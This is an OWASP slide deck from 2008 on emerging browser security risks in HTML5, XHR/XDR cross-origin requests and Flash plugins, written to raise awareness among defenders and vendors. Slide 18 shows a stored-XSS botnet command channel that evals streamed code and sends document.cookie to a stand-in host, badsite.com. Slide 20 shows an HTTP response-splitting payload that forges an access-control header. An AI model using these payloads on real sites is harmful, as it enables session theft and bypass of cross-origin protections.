Browser security
- 1. Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
OWASP – Browser Security
Roberto Suggi Liverani
Security Consultant
Security-Assessment.com
3 September 2008
- 2. OWASP
Who am I?
Roberto Suggi Liverani
Security Consultant, CISSP - Security-
Assessment.com
4+ years in information security, focusing on
web application and network security
OWASP New Zealand founder/leader
2
- 3. OWASP
Agenda
Introduction
A look to the present
The potential risks
Some challenges
HTML 5.0
WebApps (XHR)
Browser Plugins
OWASP approach to the problem
OWASP Intrinsic Group
3
- 6. OWASP
Introduction
The risks are not just in the numbers…
Do you remember “On the job browser exploitation”
talk of Mark Piper?
Technologies evolve:
HTML5
XHR
Browser Plugin
Current browser security progress mainly
focused on:
Reflected XSS filtering and CSRF protection
Phishing web sites detection
6
- 7. OWASP
Next Challenges
HTML5 (W3C working draft)
New features with a security impact:
Origin-Policy
Browsing contexts and navigation
Custom protocol and content handlers
Structured client-side storage
Offline Web applications
Cross-document messaging
Server-sent events
Web sockets
7
- 9. OWASP
HTML5
Browsing Contexts and Navigations
Opener browsing context – 1.COM
Auxiliary Browser Context - 3.COM
Nested browser context - 2.COM
9
Malicious Third party
3.COM
(b) Iframe
injection
src=2.COM
1.COM (vulnerable)
Cross Context
Scripting between
2.COM and
3.COM
(a) Injection in
1.COM of
document.open
pointing to
3.COM
- 10. OWASP
HTML5
Custom Protocol and content handlers
registerProtocolHandler() – ftp:, fax:, foo:
registerContentHandler() – MIME type, text/foo
10
A.COM
B.COM
navigator.registerCont
entHandler(‘text/foo',
‘foo?url=%s', ‘foo')
<a href=test.foo>Download</a>
Test.foo served as
text/foo
redirection to:
http://a.com/foo?
url=b.com/test.foo
- 11. OWASP
HTML5
Hijacking content or protocol handlers
navigator.registerProtocolHandler(‘HTTPS', ‘foo?url=
%s', ‘foo')
Register Spamming
Site tries to register multiple protocol/content handlers
Multiple sites try registering video/mpeg content
Leaking Intranet URLs
User registers a certain content handler (text/foo)
User clicks http://192.168.0.32/hello.foo
User redirected to external site which handles text/foo
Leaking HTTPS
User redirected to site with HTTPS URL
Leaking credentials in GET Request 11
- 12. OWASP
HTML5
Structured Client Storage
sessionStorage (adds data to the session for all
pages under same domain)
localStorage (adds complex data to client’s cache)
Methods: getItem(), setItem()
Only protection: origin policy
SQL, yes SQL!!! – to store more structured data
Methods: openDatabase(), executeSQL()
Objects: SQLResultSet, SQLResultSetRowList,
SQLError
More to come on “browser SQL injection”…
12
- 13. OWASP
HTML5
Client Storage Attack Example (A. Trivero)
Browser SQL Injection Example (A. Trivero)
Cross-Directory Attack
XSS in www.geocities.com/user1 can read/write data
from/to www.geocities.com/user2
User Tracking - UI put in client-storage in multiple
sites (marketing, botnet, etc.)
Cookie Resurrection 13
- 14. OWASP
HTML5
Offline Web Applications
Extensive Application Cache API
<manifest>http://a.com/manifest</manifest>
HTTP response with text/cache-manifest MIME type
for manifest
Manifest specifies how specific site content should be
cached = application cache policy
New items can be added to specific cached content
with method add()
Different versions of cached content for the same site
Application Cache status can be queried:
Uncached, Idle, Checking, Download, Updateready
14
- 15. OWASP
HTML5
Application Cache Poisoning
A.COM’s manifest allows caching of vulnerable HTML
page containing DOM XSS
DOM XSS manipulates data when viewed in off-line
mode
Attacking offline browser
Off-line application cache content with stored XSS
that sets navigator.onLine=TRUE
15
- 16. OWASP
HTML5
Cross Document Messaging
“While this (origin policy) is an important security
feature, it prevents pages from different domains from
communicating even when those pages are not
hostile” – 7.4 W3C HTML5 current draft
postMessage(message, messagePort, targetOrigin)
16
window.addEventListener('message', receiver, false);
function receiver(e) {
if (e.origin == 'http://a.com') {
if (e.data == 'Hello world') {
e.source.postMessage('Hello', e.origin);
} else {
alert(e.data);
} } }
A.COM
B.COM
var o = document.getElementsByTagName('iframe')[0];
o.contentWindow.postMessage('Hello world',
'http://b.com/'); NOTE: this
condition can be
omitted or = *
- 17. OWASP
HTML5
Server-Sent Events
Dispatching DOM events into document that expect it
RemoteEventTarget used to fetch data sent as
EventStream (text/event-stream) from:
Same site
Allowed sites (XHR access control)
<eventsource src=http://news.com/news.php
onmessage=“var stream; event.stream.split(‘n’);
showNews(stream[0],stream[1],stream[2]);”>
17
<eventsource>
data: http://www.google.com/news/1n
data: http://www.yahoo/com/news/3n
data: http://bbc.co.uk/news/2n
EventStrea
mPULLS
- 18. OWASP
HTML5
Next generation web botnet – C&M interface
18
BOTNE
T
badsite.com/e
vil.php
Stored XSS in botnet websites:
<eventsource src=http://badsite.com/evil.php
onmessage=“var stream; event.stream.split(‘n’);
eval(stream[0],stream[1],stream[2]);”>
Data Stream (MIME: text/event-stream)
Data: wait();n
Data: wait();n
Data: document.write(<img
src=‘http://badsite.com/’+document.cookie);n
Botnet operates
following XHR
access control
for data
exchange
- 19. OWASP
HTML5
Web Sockets – websocket(url);
Botnet scenario applies as well 19
Client at 123.com Server at aa.com
GET ws://aa.com/
HTTP/1.1
Upgrade: WebSocket
Connection: Upgrade
Host: 123.com
Origin: http://123.com
Authorization: Basic d2FsbGU6ZXZl
HTTP/1.1 101 Web Socket Protocol
Handshake
Upgrade: WebSocket
Connection: Upgrade
WebSocket-Origin: http://aa.com
WebSocket-Location: ws://aa.com:80/
Data Framing
Read/send data byte per byte
Data Framing
Send/read raw UTF8 data byte per
byte
Close TCP/IP connection – no
handshake
Close TCP/IP connection – no
handshake
- 20. OWASP
WebApps (XHR)
XHR Access Control (GET and POST)
20
Resource:
aaa.com/test.txt
Client:
bbb.com
JavaScript + XHR:
new client = new XMLHttpRequest();
client.open("GET or POST",
"http://aaa.com/test.txt")
client.onreadystatechange = function()
{ /* do something */ }
client.send()
HTTP Response:
Access-Control-
Allow-Origin:
http://bbb.com
Hello World!
GET
NOTE: the entire
access control system
relies on HTTP headers
So what happens
with an HTTP
Splitting Attack?
JavaScript + XHR:
new client = new XMLHttpRequest();
client.open("GET or POST",
"http://aaa.com/test.txt%0A
%0DAccess-Control-Allow-Origin:
http://bbb.com%0a%0d%0a%0d")
client.onreadystatechange = function()
{ /* do something */ }
client.send()
- 21. OWASP
WebApps (XHR)
XHR Access Control (Other HTTP methods)
21
Resource:
aaa.com/test.txt
Client:
bbb.com
JavaScript + XHR:
new client = new XMLHttpRequest();
client.open(“OPTIONS",
"http://aaa.com/test.txt")
client.onreadystatechange = function()
{ /* do something */ }
client.send()
HTTP Response:
Access-Control-
Allow-Origin:
http://bbb.com
Access-Control-Max-
Age: 3628800
Preflight Request:
OPTIONS
JavaScript + XHR:
new client = new
XMLHttpRequest();
client.open(“DELETE",
"http://aaa.com/test.txt")
client.onreadystatechange =
function() { /* do something
*/ }
client.send()
DELETE
NOTE: the entire
access control system
relies on HTTP headers
- 22. OWASP
XHR Alternative – XDR (Xdomain Request)
Cross-domain request developed by Microsoft
22
Resource:
aaa.com/xdr.txt
Client:
bbb.com
JavaScript + XDR:
xdr = new XDomainRequest();
xdr.open(“GET",
“http://www.aaa.com/xdr.txt")
HTTP Response:
XDomainRequestAllo
wed=1
Hello!
GET
HTTP Request:
GET /xdr.txt
XDomainRequest: 1
Host: bbb.com
NOTE: the entire XDR
relies on HTTP headers
- 23. OWASP
Browser Plugins
Adobe Flash
LSO (Local Shared Objects)
Cookie system completely managed by Adobe
100KB cache data allowed by default
Third Party LSO are allowed by default (100kb cache)
LSO data stored and accessed “stealthily”
Typically stored in:
C:Documents and Settings[username]Application
DataMacromediaFlash Player
Files in the format .sol
This “feature” has already been exploited:
United Virtualies -> PIE (Persistent Identification Element)
Creates a unique ID for each browser and then stores in
LSO
23
- 24. OWASP
Browser Plugins
ActionScript FileReference.Download bypasses
browser security settings
IKAT’s Paul Craig 0day technique to bypass kiosk software
protection (IE’s security model)
Something like:
24
test.addEventListener(MouseEvent.CLICK,
downloadFile);
var fileRef:FileReference = new
FileReference();
function downloadFile(event:MouseEvent):void {
fileRef.download(new
URLRequest("http://www.aaa.com/file.html"),
“file.html");
}
- 25. OWASP
OWASP Intrinsic Group
Aid browser vendors, framework vendors in
addressing current security issues
Focus on:
HTML5 Working Group
XMLHTTPRequest
Webapp Working Group
Mozilla Firefox
Adobe (AIR/Flash)
Microsoft IE7
Microsoft .NET
Struts
Spring
Apache Commons
Soon: OWASP Top Ten Browser Security 25
- 27. OWASP
References
HTML5
http://www.whatwg.org/specs/web-apps/current-work
XHR and XHR Level 2
https://wiki.mozilla.org/Cross_Site_XMLHttpRequest
http://dev.w3.org/2006/webapi/XMLHttpRequest-2
Access Controls XHR
http://www.w3.org/TR/access-control/
XDR
http://msdn.microsoft.com/en-us/library/cc288108(VS.85).aspx
http://lists.w3.org/Archives/Public/public-appformats/2008Mar/0017.html
LSO
http://epic.org/privacy/cookies/flash.html
https://www.flashsec.org/wiki/Shared_Objects#Storage_location
http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_
manager07.html
http://www.adobe.com/products/flashplayer/articles/lso/
http://en.wikipedia.org/wiki/Local_Shared_Object
27
- 28. OWASP
References
HTML5 - Presentation
http://www.owasp.org/index.php/AppSecEU08_HTML5
Abusing HTML 5 Structured Client-side Storage
http://trivero.secdiscover.com/html5whitepaper.pdf
Web Stats
http://www.internetworldstats.com/stats.htm
Browser Stats
http://www.w3schools.com/browsers/browsers_stats.asp
28
Editor's Notes
- Updateready-&gt; application cache is not the newest